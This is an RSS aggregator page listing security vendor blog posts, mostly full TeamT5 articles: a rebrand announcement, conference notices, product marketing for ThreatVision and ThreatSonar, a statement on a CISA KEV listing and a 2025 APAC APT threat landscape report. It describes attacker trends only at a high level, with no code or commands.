Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ日本語版 & nao_sec & ESET Ireland & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided

Symantec CBX Through the Paparazzi Lens

Fri, 03 Apr 2026 13:00:00 -0000

A recap of all the media moments that surprised us—and everyone’s still talking about
The U.S. Navy’s Playbook for Cost-Controlled, Reliable Cybersecurity

Wed, 01 Apr 2026 10:00:00 -0000

A case study in how Carahsoft and Broadcom deliver efficiency and savings
The Modern Threat Landscape and The Partner’s New Burden

Tue, 31 Mar 2026 14:20:00 -0000

Part 1 of 6: Resale is fading. Resilience is rising.
Symantec CBX Rocked RSAC 2026 Conference

Fri, 27 Mar 2026 17:00:00 -0000

CBX debuted to great acclaim at one of cybersecurity’s greatest conferences
For Financial Services, a Wake-Up Call for Reclaiming IAM Control

Fri, 27 Mar 2026 10:00:00 -0000

Part 5: How to achieve resilience, auditability, and AI-scale identity—without betting the bank on someone else’s control plane
The Next Identity Shift

Thu, 26 Mar 2026 13:00:00 -0000

Runtime governance for securing the agentic enterprise
Cyber Legends: Behind the Scenes of CBX

Wed, 25 Mar 2026 12:00:00 -0000

An exclusive Cyber Legends interview with Arjun Narang, one of the experts behind the unified security platform everyone’s buzzing about
Built for This Moment (and All Those to Come)

Mon, 23 Mar 2026 11:30:00 -0000

Introducing Symantec CBX: Finally, a security platform for smaller teams fighting larger threats
Libyan Oil Refinery Among Targets in Long-running Likely Espionage Campaign

Fri, 20 Mar 2026 10:00:00 -0000

The modular backdoor AsyncRAT was deployed on targeted networks.
How Cloud-Managed DLP Lowers the Barrier to Entry

Thu, 19 Mar 2026 11:00:00 -0000

Quick deployment, meaningful visibility and a foundation for long-term data security
TeamT5: From an APAC Threat Intelligence Pioneer to a Global Leader

Tue, 31 Mar 2026 16:00:00 -0000

For nearly two decades, TeamT5 has been deeply rooted in the Asia-Pacific region—researching threat actors, tracking attack campaigns, and uncovering overlooked risks and signals. Today, we officially unveil TeamT5’s new brand identity. This transformation is more than a visual update; it is a definitive signal of our identity, our values, and our global trajectory. ##A Threat Intelligence Pioneer Rooted in Asia-Pacific TeamT5 is a threat intelligence pioneer born in Asia. Based in Taiwan, we leverage an unique geopolitical perspective and deep linguistic expertise to track Advanced Persistent Threats (APTs) and ransomware activity across the region. We provide more than just data to government agencies, financial institutions, and technology leaders ; we deliver actionable insights grounded in regional context—intelligence that organizations can immediately deploy in high-stakes environments. This rebranding does not change our direction. Instead, it is the purest expression of the mission we have upheld from the start: Transforming complex threats into decisive action. ##The Evolution: From Technical Roots to Global Trusted Partner TeamT5’s mission has always been clear, though never simple: Transform complex threats into actionable intelligence that enables organizations to move from reactive defense to smarter detection and response. As threats evolve faster and become harder to track and interpret, the value of intelligence cannot stop at simply telling organizations what has happened. This moment marks a pivotal step forward: <ul> <li>A Mature Identity: We have evolved from a technical startup into a professional, trusted enterprise brand.</li> <li>Global Unity: We are establishing a unified presence as we expand our long-term footprint in international markets.</li> <li>Operational Focus: Our new visual identity reflects how we operate—remaining alert as threats evolve, acting swiftly in critical moments, and staying sharply focused on what truly matters.</li> </ul> The concept of our new logo - The Spotlight: Sharpen the Sight. It symbolizes our role in the ecosystem. We are not defenders standing passively under the spotlight. Instead, we are intelligence hunters who precisely locate threats in the shadows, operating at the boundary between the visible and the unseen. Our goal is not to illuminate everything. Rather, we focus on the signals that truly matter—so our customers can see more clearly, assess risks confidently, and act decisively. ![](https://uploads.teamt5.org/upload/original/teamt5-from-an-apac-threat-intelligence-pioneer-to-a-global-leader_en_pic.png) ##Our Core Values: Threat Intelligence that Powers Proactive Defense We believe the value of threat intelligence lies not in the volume of information, but in whether it enables organizations to identify critical signals earlier. TeamT5’s vision is to become the most trusted threat intelligence partner in the Asia-Pacific region, helping organizations move from responding to attacks toward anticipating threats. Behind this vision are the four core values that have long guided TeamT5. These values are not just principles—they shape how we conduct research, build products, and collaborate with partners. ###Continuous Exploration We never stop exploring. Beyond monitoring known threats, we actively venture into the unknown—uncovering overlooked signals in complex threat landscapes and revealing emerging attack patterns and techniques. ###Precise Insight Precision is the foundation of proactive defense. We do more than track indicators—we analyze the logic behind threats so that intelligence can truly support critical decision-making. ###Agile Action Speed is essential when facing cyber threats. We track every step of the attacker, enabling action before threats escalate and transforming intelligence into real-time protection. ###Trusted Collaboration Threat intelligence becomes stronger when shared. Through open knowledge exchange and two-way communication, we build long-term partnerships with customers and collaborators based on trust—standing together against evolving threats. ##Continuing the Journey of Exploration TeamT5 is both an explorer and an innovator in threat intelligence. We lead the discovery of emerging threats, deconstruct adversary behavior, and build defensive capabilities that evolve as quickly as our adversaries. This rebranding represents our continued commitment to exploration, insight, action, and collaboration. It also reaffirms our belief: When intelligence is done right, organizations gain the advantage in cyber defense. TeamT5’s founding mission remains unchanged— more precise intelligence, earlier action. We are ready. The next chapter starts now.
Decoding Modern Cyber Threats: From Intelligence to Action in APAC [Podcast Series]

Mon, 30 Mar 2026 16:00:00 -0000

What if the warning signs of the next cyberattack are already visible—hidden in policy shifts, dark web chatter, and evolving APT campaigns across APAC? This podcast series uncovers how modern threat intelligence works in practice: from turning raw data into decisions, to understanding cybercrime-as-a-service, fixing patch prioritization failures, and combining IoCs with proactive threat hunting. Tune in to uncover the signals behind today’s cyber threats—and learn how to stay one step ahead. ##How Threat Intelligence Becomes Decision-Ready This briefing explains how raw threat data is transformed into structured intelligence that supports strategic and operational decisions. <ul> <li>Listen Now: <a href="https://youtu.be/yTds7lvtEzc">https://youtu.be/yTds7lvtEzc</a></li> </ul> ##How APAC APT Campaigns Are Evolving This briefing analyzes how advanced persistent threat campaigns in APAC evolve across stages, targeting strategies, and persistence models. <ul> <li>Listen Now: <a href="https://youtu.be/5gkgpheTahM">https://youtu.be/5gkgpheTahM</a></li> </ul> ##Inside Today’s Cybercrime-as-a-Service Ecosystem This briefing examines how cybercrime groups operate as structured service ecosystems, lowering barriers to entry for attackers. <ul> <li>Listen Now: <a href="https://youtu.be/BMm1reTszQE">https://youtu.be/BMm1reTszQE</a></li> </ul> ##How APAC Cyber Policy Signals Emerging Threats This briefing discusses how geopolitical and cyber policy developments in APAC shape threat actor behavior and targeting trends. <ul> <li>Listen Now: <a href="https://youtu.be/w2CuYp0mLG8">https://youtu.be/w2CuYp0mLG8</a></li> </ul> ##What the Deep & Dark Web Reveals Before Attacks This briefing analyzes how underground forums and hidden marketplaces signal emerging threats before incidents surface publicly. <ul> <li>Listen Now: <a href="https://youtu.be/KeZbhkTyl4M">https://youtu.be/KeZbhkTyl4M</a></li> </ul> ##Why Patch Prioritization Keeps Failing This briefing examines why vulnerability overload leads to ineffective patching and how intelligence-driven prioritization improves outcomes. <ul> <li>Listen Now: <a href="https://youtu.be/ow_GhYNZL8E">https://youtu.be/ow_GhYNZL8E</a></li> </ul> ##How IoCs and Threat Hunting Work Together This briefing explores how indicators of compromise and proactive threat hunting complement each other in detecting adversary activity. <ul> <li>Listen Now: <a href="https://youtu.be/9jvQkd6gxfc">https://youtu.be/9jvQkd6gxfc</a></li> </ul> Subscribe TeamT5 on YouTube to catch latest threat trend and defense strategy: <a href="https://www.youtube.com/@teamt5/featured">TeamT5 YouTube Channel</a>
TeamT5 at CyberSecMY Conference 2026 (CSMY2026)

Mon, 09 Mar 2026 16:00:00 -0000

TeamT5 is proud to announce our participation in <a href="https://cybersecasia.org/csmy2026">CyberSecMY Conference 2026 (CSMY2026)</a>, one of Malaysia’s premier cybersecurity events bringing together cybersecurity leaders, practitioners, and decision-makers across industries. CSMY2026 serves as a vital platform for addressing today’s most pressing cybersecurity challenges and sharing best practices in an increasingly complex threat landscape. With 40+ distinguished speakers and panelists, the conference delivers deep insights into the latest cyber threats, trends, and defensive strategies shaping the future of security. The event is expected to welcome 400+ senior security professionals from sectors including financial services, retail, IT, healthcare, public sector, enterprises, and consumer businesses. At CSMY2026, TeamT5 will demonstrate how our advanced threat intelligence and APT research empower organizations to proactively detect, understand, and mitigate sophisticated cyber threats. Our team looks forward to engaging with industry peers, exchanging insights, and supporting Malaysia’s cybersecurity resilience. Visit TeamT5 at the exhibition area and connect with our experts to learn how actionable threat intelligence can strengthen your security posture. <h2 id="teamt5-at-cybersecmy-conference-2026">TeamT5 at CyberSecMY Conference 2026</h2> <ul> <li>Date: May 19-20, 2026</li> <li>City: Kuala Lumpur, Malaysia</li> <li>We'll have a booth at the venue. Welcome to talk us at the booth.</li> </ul> ###Speech: The Evolving Cybersecurity Landscape in APAC: Real-World Threat Cases from Malaysia <ul> <li>Time: 2:25 PM in May 20 (It may subject to change under organizer's arrangement) </li> <li>Speaker: John Lu (Assistant Vice President, Global Engagement, TeamT5) </li> <li>About Speaker: John is the AVP of Global Sales at TeamT5 and a cybersecurity veteran with over 15 years of experience. Before transitioning into his global sales role, he spent seven years leading the technical support team at TeamT5, working closely with organizations to develop practical threat hunting strategies and translate complex threat intelligence into actionable security insights. </li> <li>About Speech: <ul> <li>Geopolitical drivers of state-sponsored espionage and its impact on regional stability.</li> <li>The APT Landscape: Identifying major regional APT actors, TTPs, motivations, and target industries. </li> <li>Malaysia-Specific case studies.</li> <li>Turning threat intelligence into proactive threat hunting strategies.</li> </ul> </li> </ul>
Reaching the Peak of Defense with ThreatVision Intelligence

Sun, 01 Mar 2026 16:00:00 -0000

Defending against cyber threats today is like navigating complex terrain. Organizations must understand the broader landscape, adjust as conditions change, and move carefully through high-risk areas. Without a comprehensive view of threats, teams are easily overwhelmed by alerts and miss what truly matters. Effective defense requires different perspectives. Executives focus on long-term risk, operations leaders need attack context, and frontline teams rely on precise technical indicators. ThreatVision connects these needs through a structured intelligence framework, turning fragmented data into usable threat intelligence that supports decisions from strategy to response. ##ThreatVision’s Three Intelligence Perspectives: Building an Effective Defense Framework ThreatVision organizes years of threat research into three intelligence layers—Strategic, Operational, and Tactical—each designed to support specific roles and defense objectives. ###1. Strategic: Understanding Threat Trends, Geopolitical Impact, and Industry Risk Strategic intelligence is designed for CISOs and executives who need a macro-level view of risk. It focuses on identifying trends in threat actors and targeting behavior, while incorporating geopolitical dynamics and policy environments to assess systemic risk across industries. This intelligence supports mid- to long-term security planning and informed resource allocation. <ul> <li>APT Group Research: Analysis of active APAC threat groups, focusing on evolving tactics, targets, and operational scope.</li> <li>Asia-Pacific Cyber Policy: Assessment of geopolitical developments—particularly China—alongside cybersecurity policy and regulatory trends from the Chinese-speaking world.</li> <li>Threat Landscape Overview: Analyzes long-term threat trends across national, regional, and industry levels.</li> </ul> ##2. Operational: Analyzing Adversaries, Criminal Ecosystems, and Attack Chains Operational Intelligence supports SOC and investigation teams by clarifying attack context and linking fragmented alerts into coherent incidents. It enables analysts to understand adversary identity, methods, and intent, providing shared context for coordinated investigation and response. <ul> <li>APT Threat Analysis: Correlation of APAC APT activity with geopolitical context, including incident background, IoCs, adversary profiles, targets, and TTPs.</li> <li>Cybercrime Intelligence: Tracking of underground forums and Crime-as-a-Service (CaaS) ecosystems, including deep and dark web activity and Chinese-language encrypted communities.</li> <li>Malware: Correlation of malware samples and behaviors to assess attacker intent and malware evolution.</li> </ul> ###3. Tactical: Enabling Frontline Defense with Actionable Tools and Vulnerability Focus Tactical Intelligence is designed for frontline security and infrastructure teams. It delivers technical indicators and tools that can be directly applied to firewalls, Endpoint Detection and Response (EDR), and Security Information and Event Management (SIEM) systems, enabling rapid detection and immediate threat blocking. <ul> <li>Vulnerability Solutions: Insight into real-world exploitation patterns and patch prioritization.</li> <li>Deep & Dark Web Risk Monitoring: Early warning from deep and dark web forums, marketplaces, and Chinese-language underground communities.</li> <li>Indicators of Compromise (IoCs): IoCs associated with nation-state APT activity and large-scale cybercrime.</li> <li>Threat Hunting Tools: Intelligence-driven detection rules for proactive threat hunting.</li> </ul> <img src="https://uploads.teamt5.org/upload/original/reaching-the-peak-of-defense-with-threatvision-intelligence_form_EN.png" alt=""> ##Crossing the Ridge with ThreatVision Threats do not slow down, but organizations can control how they respond. By shifting between Strategic, Operational, and Tactical Intelligence, ThreatVision helps teams maintain direction, clarify context, and enforce protection. The result is a stable, resilient defense framework—even as the threat landscape continues to change. <img src="https://uploads.teamt5.org/upload/original/reaching-the-peak-of-defense-with-threatvision-intelligence_gif%20update_EN.gif" alt="">
TeamT5 Statement Regarding CISA’s KEV Catalog Updates

Sun, 22 Feb 2026 16:00:00 -0000

TeamT5 acknowledges the recent updates by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to its <a href="https://www.cisa.gov/news-events/alerts/2026/02/17/cisa-adds-four-known-exploited-vulnerabilities-catalog">Known Exploited Vulnerabilities (KEV) Catalog</a>, which highlights vulnerabilities that have been seen exploited in the wild by malicious actors and underscores the importance of effective remediation and ongoing vigilance within the cybersecurity ecosystem. We would like to clarify our position and provide accurate context regarding the historical vulnerability referenced in the KEV Catalog and related reporting: 1. Historical Vulnerability Identified and Fully Remediated The vulnerability referenced in the KEV Catalog and in related media reports pertains to an issue identified in 2024 within our ThreatSonar Anti-Ransomware product. <ul> <li>The vulnerability was proactively discovered by TeamT5’s Product Security Incident Response Team (PSIRT) during internal security reviews.</li> <li>Upon discovery, TeamT5 immediately developed and released a patch, and we proactively assisted all affected customers with updating to the remediated version.</li> <li>All impacted customers have since migrated off the vulnerable versions; no customer systems remain in service with the affected release.</li> </ul> A public advisory was issued by TeamT5 in July 2024 with <a href="https://teamt5.org/en/posts/vulnerability-notice-threat-sonar-anti-ransomware-20240715/">full details about the vulnerability and patch guidance</a>. 2. Strengthening Security Posture and Resilience In direct response to this and similar industry risk signals such as those highlighted in recent CISA KEV updates, TeamT5 has invested significantly in strengthening our security practices: <ul> <li>Enhancing our secure software development lifecycle and product security controls.</li> <li>Formalizing and standardizing internal incident response and vulnerability management processes.</li> <li>Engaging independent third-party security teams for red team exercises and external validation of our security defenses.</li> </ul> These investments reaffirm our commitment to industry best practices and customer protection. 3. Ongoing Monitoring and Threat Detection TeamT5 maintains continuous monitoring of threats and exploitation activity impacting our products and the broader cybersecurity landscape. Our security and threat intelligence teams remain alert to emerging risks and stand ready to respond quickly with mitigations and customer support when needed. 4. Commitment to Community and Transparency We support initiatives like the CISA KEV Catalog as an important resource for helping organizations prioritize remediation of vulnerabilities exploited in the wild. TeamT5 continues to collaborate with the cybersecurity community, share information responsibly, and ensure our customers are informed and protected.
We’re Exhibiting at RSA Conference 2026

Sun, 08 Feb 2026 16:00:00 -0000

We are pleased to announce that we will be exhibiting at RSA Conference 2026, one of the world’s leading cybersecurity events, taking place in San Francisco. This year, we will join the Taiwan Pavilion and present our approach to threat intelligence built from Asia-born insights with global relevance. <ul> <li>Event: RSA Conference 2026</li> <li>Expo date: March 24-26, 2026</li> <li>Booth: S-1561</li> <li>Location: Moscone Center at San Francisco, USA</li> </ul> ##Threat Intelligence Pioneer, Born in Asia Cyber threats do not emerge evenly across regions.Many large-scale campaigns and advanced persistent threats (APTs) are first observed in Asia before expanding globally. As a threat intelligence team born and rooted in Asia, we focus on delivering early visibility into adversary behavior, regional geopolitical context, and long-term campaign evolution—helping organizations understand not only what is happening, but why it is happening. At RSA Conference 2026, we will showcase how Asia-Pacific–centric intelligence can complement global security strategies and close critical visibility gaps. ##Our Threat Intelligence Approach Our intelligence framework is designed to support security decision-making across strategic, tactical, and operational layers: ###Strategic: Geopolitical Insight & Adversary Profiling We analyze geopolitical drivers and long-term adversary behavior to help organizations anticipate emerging threats, understand attacker motivations, and assess risk beyond isolated incidents. ###Tactical: Intelligence-Driven Threat Hunting Our intelligence translates real-world adversary TTPs and active campaign insights into actionable threat hunting, enabling security teams to focus on relevant actors rather than generic indicators. ###Operational: Threat Response We help organizations operationalize threat intelligence and ensure intelligence is embedded directly into detection and response workflows. Together, these layers turn threat intelligence from static information into practical, actionable defense. For more about our threat intelligence reports and platform "ThreatVision", please check <a href="https://teamt5.org/en/products/threatvision/?utm_source=blog&utm_medium=website">here</a>. ##Meet Us at RSA Conference 2026 Throughout the three-day event, our team will be available at Booth S-1561 to discuss: <ul> <li>Asia-Pacific threat actors and campaigns</li> <li>Intelligence-driven threat hunting strategies</li> <li>Operationalizing threat intelligence at scale</li> <li>How regional intelligence enhances global defense</li> </ul> Whether you are building a CTI program, refining threat hunting workflows, or looking to strengthen operational response, we welcome the opportunity to connect. Threat Intelligence Pioneer, Born in Asia 📍 Visit us at RSA Conference 2026 – Booth S-1561 (Taiwan Pavilion) <img src="https://uploads.teamt5.org/upload/original/teamt5-rsa-conference-2026_pic.png" alt="">
APT Threat Landscape in APAC 2025: Industrialization of Intrusions

Sun, 08 Feb 2026 16:00:00 -0000

With geopolitical tensions continuing to escalate across the APAC region, APT activities in the region are intensifying in both volume and sophistication. In 2025, TeamT5 tracked more than 510 APT operations affecting 67 countries globally, up steadily from 2024. Of these, 173 attacks targeted Taiwan, far exceeding activity levels seen in other regional targets. Over the years, we observe Taiwan remains the most consistently and heavily targeted environment for cyber operations, with China responsible for the majority of observed activity. Taiwan’s role in geopolitical tensions and values in global technology supply chain makes it uniquely vulnerable for adversaries who seek intelligence or long-term access to achieve political and military objectives. The scale, diversity, and persistence of these campaigns position Taiwan not only as a frontline target, but also as an early-warning bellwether for the direction of China-nexus intrusion tradecraft. Campaigns observed in Taiwan frequently showcase early adoption of new tooling and evolving TTPs; therefore, Taiwan is more than just a target—it functions as a proving ground where China-nexus APTs test and refine their tactics before scaling them to other environments. <h2 id="key-trends-targeting-of-edge-devices-abuse-of-trusted-services-and-disposable-malware">Key Trends: Targeting of Edge Devices, Abuse of Trusted Services, and Disposable Malware</h2> As defenders continue to harden endpoints with capabilities like EDR, threat actors are adapting by shifting operations to layers with comparatively limited telemetry and weaker detection coverage. That shift is reflected in our 2025 findings: we tracked 27 critical vulnerabilities, most of which impacted edge devices such as firewalls, routers, and VPN appliances. Moreover, China-nexus actors have paired exploitation with custom backdoors tailored to specific device families. These backdoors are often designed to persist even after the underlying vulnerability is patched or the device is rebooted. This transforms one-time perimeter access into long-term access across victim networks and significantly raises the difficulty of detection and complete eradication. In addition, Internet of Things (IoT) devices are increasingly being abused by threat actors for a range of malicious objectives, particularly as low-noise infrastructure that blends into normal network traffic. For example, we observed actors chaining compromised IoT devices into operational relay box (ORB) networks to stage and route attacks, effectively obscuring the origin of malicious activity. In other cases, actors have abused Network Attached Storage (NAS) systems as reverse SSH tunnel relays, facilitating data exfiltration through an intermediary that often appears benign. Supply chain attacks accelerated further in 2025, reinforcing what TeamT5 describes as “Fail-of-Trust Model”. In a supply chain attack, threat actors compromise software vendors, managed service providers, or cloud service providers to exploit inherited trust and pivot into their downstream customer environments. In Taiwan, TeamT5 observed multiple attacks in which Chinese actors (e.g., Huapi and SLIME86) first compromised upstream IT service providers, then leveraged that access to move laterally into government, military, and critical infrastructure networks. In other notable cases attributed to China-nexus SocialNetworkTeam and SLIME40 (aka Salt Typhoon), threat actors compromised national telecom networks and used that access for long-term traffic interception and surveillance, including DNS manipulation and ISP-level hijacking. These campaigns directly erode the foundational assumptions of the digital ecosystem: that “trusted” suppliers are secure. By weaponizing trusted relationships as attack paths, supply chain operations turn implicit trust into a liability, hence the “Fail-of-Trust Model.” Consistent with this shift, we observed a clear uptick in 2025 attacks aimed at the IT sector. Threat actors are increasingly treating IT providers as strategic infrastructure, using them as launchpads to reach downstream targets more efficiently and at far greater scale. Malware deployment tradecraft also evolved in 2025. Across the 300+ malicious samples we tracked, we saw a clear rise in customized, disposable “one-time” malware. Much of it consisted of lightweight loaders and downloaders which are quick to build, easy to tailor to a specific intrusion chain, and inherently more capable of evading signature-based detection. In parallel, we increasingly observed multi-tool intrusion stacks, where actors deploy more than one malware family and/or a mix of malware and legitimate hacking tools within the same operation. This reduces single points of failure: if one component is detected or blocked, others can maintain access, pivot laterally, or re-establish command-and-control. For defenders, the result is a broader, more fragmented footprint that slows triage and makes complete eradication harder. <h2 id="from-apt-groups-to-a-china-nexus-whole-of-nation-apt-ecosystem">From APT Groups to a China-nexus “Whole-of-Nation” APT Ecosystem</h2> The observed increase in volume and sophistication of APT operations occurs in parallel with increasing signs of a maturing APT ecosystem in China. Over the years, China has been cultivating its offensive cyber capabilities through a “whole-of-nation” model: In this model, the state retains strategic direction (e.g., prioritizing intelligence requirements and target sets) while execution capacity is expanded through a market of contractors, brokers, and specialist vendors. Public attributions and industry reporting over the last few years increasingly describe a threat landscape where the boundary between “state” and “private sector” is operationally blurred, producing an industrial-scale pipeline for intrusions. The Chinese APT ecosystem blends state direction with “hacking-as-a-service” dynamics: capability is packaged, priced, and delivered in units that can be purchased, tasked, or repurposed. The 2024 I-Soon leak has shown how a private Chinese company conducted intrusions and monetized access and how such kind of contractor capacity can be integrated into state-aligned operations. In 2025, more evidence surfaced—via indictments, sanctions packages, and leaked materials—that Chinese private-sector vendors are not merely tooling suppliers but can play operational roles across intrusion activity. Taken together, these disclosures point to an ecosystem that is becoming more modular and specialized as it scales. That industrialization is most visible in the shift from a traditional “one APT group runs the full kill chain” assumption to a service-layered model. Instead of one team doing everything end-to-end, different providers can contribute capabilities at distinct stages. Examples map cleanly onto this cyber supply chain: At the front end are large-scale reconnaissance providers conducting internet-wide scanning and target profiling; Midstream are developers producing exploits, modular malware components, and tailored one-time payloads, optimized for specific environments; At the back end are infrastructure operators who specialize in command-and-control, proxy layers, and operational relay box (ORB) networks. This division of labor enables faster iteration, higher operational tempo, and greater resiliency. <h2 id="looking-forward">Looking Forward</h2> For governments, enterprises, and critical sectors worldwide,** the lesson is clear: indicator-driven defense can’t keep up with an industrialized intrusion ecosystem that can quickly change tools, servers, and routes when exposed.** Defenders therefore have to move upstream to proactive, hypothesis-driven threat hunting that prioritizes durable behaviors over short-lived signatures. This approach shifts the objective from “blocking known bad” to finding active tradecraft early, before the adversary completes collection and exfiltration. But hunting alone is not enough, because this is an ecosystem problem. Effective defense also requires deep regional intelligence that explains how the ecosystem is organized. That context turns scattered telemetry into actionable understanding, enabling defenders to distinguish who is responsible for reconnaissance, initial access, payload delivery, and infrastructure enablement. With those roles mapped, defenders can better anticipate likely next moves in the kill chain and apply disruption at the points of greatest leverage. TeamT5 believes meaningful impact depends on international collaboration grounded in shared adversary insight. In other words, defenders must compete with an industrial system by responding as a coordinated system. TeamT5 is committed to doing our part: contributing high-quality cyber threat intelligence, supporting joint response efforts, and strengthening the partnerships that make collective defense work. ## About TeamT5 TeamT5 is an APAC-focused threat intelligence expert. Leveraging Taiwan’s unique geopolitical vantage point, multilingual capabilities, and over two decades of research experience, we specialize in APT and ransomware threats across the Asia-Pacific region. We deliver highly localized, action-oriented threat intelligence and defense solutions for government, financial, and technology sectors. We believe that effective cybersecurity begins with continuous tracking and deep understanding of threats. With research at our core, TeamT5 transforms complex and rapidly evolving attack behaviors into actionable intelligence, enabling organizations to anticipate risks and shift from reactive response to proactive defense—reducing cyber risk. As a practitioner of intelligence-driven cyber defense, TeamT5 continuously monitors emerging threats, precisely analyzes attack patterns, and acts with agility to minimize risk exposure. We also value trust and collaboration, actively sharing research insights at world-class cybersecurity conferences and international forums. By working closely with the global security community, as well as our customers and partners, we help advance the practical application of threat intelligence and strengthen cyber resilience. <blockquote> More insights: <a href="https://teamt5.org/en/posts/seeing-the-pattern-behind-the-attacks-apac-intelligence-for-cis-os-worldwide/?utm_source=website&utm_medium=website">[Whitepaper] Seeing the Pattern Behind The Attacks: APAC Intelligence for CISOs Worldwide</a> </blockquote>
Intelligence-driven cybersecurity check: How to accelerate the anti-hacking cycle of "detection → identification → response"?

Sun, 01 Feb 2026 16:00:00 -0000

In the wave of digital transformation, cybersecurity threats are ever-present. Imagine—attackers are silently infiltrating your network, using legitimate tools to bypass endpoint detection and response (EDR) platforms and implant hidden backdoors. According to <a href="https://bisi.org.uk/reports/apts-global-review-2022-2025-trends-regions-forecast">BISI</a>'s global <a href="https://teamt5.org/en/posts/what-is-advanced-persistent-threat-apt/">advanced persistent threat (APT)</a> trends survey, since 2022, the frequency and complexity of APT attacks have been increasing, with more than half of APT attacks concentrated in the Asia-Pacific region, affecting <a href="https://teamt5.org/en/posts/2025-h1-apt-threat-landscape-insights-asia-pacific-emerges-as-cyberattack-hotspot-experts-highlight-critical-defense-priorities/?utm_source=blog&utm_medium=website">the IT industry, government agencies, and infrastructure</a>. These are just the tip of the iceberg; many more attacks remain undetected beneath the surface, which does not mean that enterprises or organizations have not been compromised. Let's explore together how to shorten the defense cycle and achieve effective resource allocation of "speed × depth × coverage" with limited resources. ##The stealthy attacker: the defender's "blind spot". Today's cybersecurity attacks have entered the era of "disguise." APT groups cleverly exploit built-in Windows tools, system services, and even legitimate third-party applications to maliciously bypass the detection of cybersecurity solutions. Common APT camouflage techniques include: <ul> <li>Disguising as Legitimate Activity: Masquerades as legitimate tools or OS-native functions to evade EDR/AV detection</li> <li>Neutralizing Monitoring Points: Disables Windows monitoring and scanning functions to evade EDR detection</li> <li>Minimizing Artifacts: Hidden backdoors that activate only under specific connection sequences and are normally not detected.</li> </ul> Meanwhile, enterprise IT infrastructure is becoming increasingly decentralized. The intermingling of cloud services, outsourcing vendors, subsidiaries, and remote work environments creates a significant gap in visibility for defenders. Any unmonitored or unreported endpoint device may harbor a threat, further blurring the defender's vision. <blockquote> For more attack methods and prevention strategies that bypass EDR defenses, please see the article analysis: <a href="https://teamt5.org/en/posts/how-cybercriminals-bypass-edr-and-what-your-company-should-do-1/?utm_source=blog&utm_medium=website">How Cybercriminals Bypass EDR — And What Your Company Should Do</a> </blockquote> ##The triangular dilemma of limited resources: speed, depth, and coverage. Frontline cybersecurity personnel typically face the challenge of limited resources, often having to make trade-offs between speed, depth, and coverage—three factors that are difficult to achieve simultaneously in practice. ThreatSonar's core philosophy is to rapidly narrow down the scope of unknown threats using a "first screening → focused in-depth → precise handling" model, reducing the investigation from "thousands of devices" to "a few critical devices" within limited resources. Its defense strategy is analogous to "conducting a comprehensive health check first, followed by further diagnosis." ##ThreatSonar's dual-axis defense strategy: "Emergency Situation" and "Routine Operations" Two key application scenarios for ThreatSonar, constructing a complete defense strategy: 1. During emergencies: Rapid screening When a suspected intrusion or anomaly occurs, having the time to respond is crucial. <ul> <li>Rapid Locator: ThreatSonar can complete an endpoint scan in approximately one hour, identifying critical suspicious devices from thousands of devices.</li> <li>Deep Forensics: Deep forensic analysis is performed on the identified compromised devices.</li> </ul> This mechanism not only significantly shortens the investigation cycle but also avoids a large amount of time wasted on false positives and redundant analysis. 2. During Routine Operations: Regular Compromise Assessment (CA) During normal operation, ThreatSonar monitors operational status and ensures environmental safety through regular scans. <ul> <li>Establishing a Baseline: Initially establishing a normal baseline for the environment.</li> <li>Periodic Scans: Monthly or quarterly scans are used to compare newly emerging anomalies, such as unknown programs and connections, persistent mechanisms (e.g., automatic startup, WMI events), and DNS records and execution history.</li> </ul> Regular scanning allows businesses to detect potential suspicious activity early, effectively preventing threats from escalating. <blockquote> <a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website">More about ThreatSonar features</a> </blockquote> ##ThreatSonar's Four Core Advantages ThreatSonar is not just a scanning tool, but a threat identification and analysis platform that integrates threat intelligence: 1. Specialized APT Detection: Built-in YARA rule base, integrating thousands of APT backdoor signatures, and capable of importing External Intrusion Indicators (IoC) and STIX format intelligence, effectively uncovering latent threats that bypass Endpoint Detection and Response (EDR). 2. Lightweight Deployment: Supports Windows, Linux, macOS, and other operating systems. Lightweight installation; a download of approximately 5MB of executable file allows for immediate deployment without the need for driver installation or system configuration changes. Facilitates rapid, large-scale deployment, quickly enhancing enterprise defense capabilities. 3. Comprehensive Visualization and Threat Classification: Performs horizontal analysis from files, memory, network connections to event logs. Threat risk levels are presented in Levels 0–5, helping administrators prioritize threat responses. 4. Memory identification and behavior tracing: ThreatSonar can analyze memory and hacking paths, and through timeline tracing, uncover the root cause of the attack and fully reconstruct the attack process. <blockquote> <a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website">More about ThreatSonar features</a> </blockquote> ##Real-world Case Studies: ThreatSonar's Immediate Effectiveness ThreatSonar demonstrates significant benefits in real-world scenarios: <ul> <li>Case Study 1: Comprehensive Health Check for a Large Enterprise A major company that has implemented ThreatSonar to conduct a comprehensive scan of 10,000 endpoints. Within two weeks, it successfully discovered APT attack samples disguised as files and 2,268 malicious files (related to Ruby). Through automated analysis and threat risk classification, the company was able to quickly identify the hacking path and establish a long-term, periodic assessment mechanism. </li> <li>Case Study 2: Rapid Response to Global Cybersecurity Incidents in the Manufacturing Industry A manufacturing group with 50,000 employees accelerated its global incident response process through ThreatSonar. Before implementing ThreatSonar, the analysis process took 200 hours; after implementation, it only took 40 hours. Using ThreatSonar, a preliminary forensic report was completed within a few days, and the decision-making process at overseas locations was accelerated by more than five times, significantly improving overall response efficiency. </li> </ul> <blockquote> <a href="https://teamt5.org/en/products/threatsonar/?utm_source=blog&utm_medium=website">More about ThreatSonar features</a> </blockquote> ##Conclusion: The Intelligence-Driven Future of Cybersecurity ThreatSonar transforms threat defense from a passive "defense" approach to a proactive "diagnosis" approach. It not only helps enterprises shorten the time from "discovery" to "response" (Mean Time To Detect, MTTD / Mean Time To Recover, MTTR), but also, through establishing benchmark monitoring models and conducting regular checks, ensures accurate cybersecurity responses in both "daily operations" and "incident response" scenarios. In an era of limited resources and unlimited threats, the TeamT5 solution embodies an "intelligence-driven" cybersecurity mindset—based on threat intelligence and centered on insight, it enables rapid and effective proactive threat defense.
Wargaming a China-Taiwan Conflict and Its Cyber Scenarios

Wed, 25 Mar 2026 14:03:25 -0000

China’s use of cyber strategies in a conflict with Taiwan is likely to follow a methodical, gradual approach

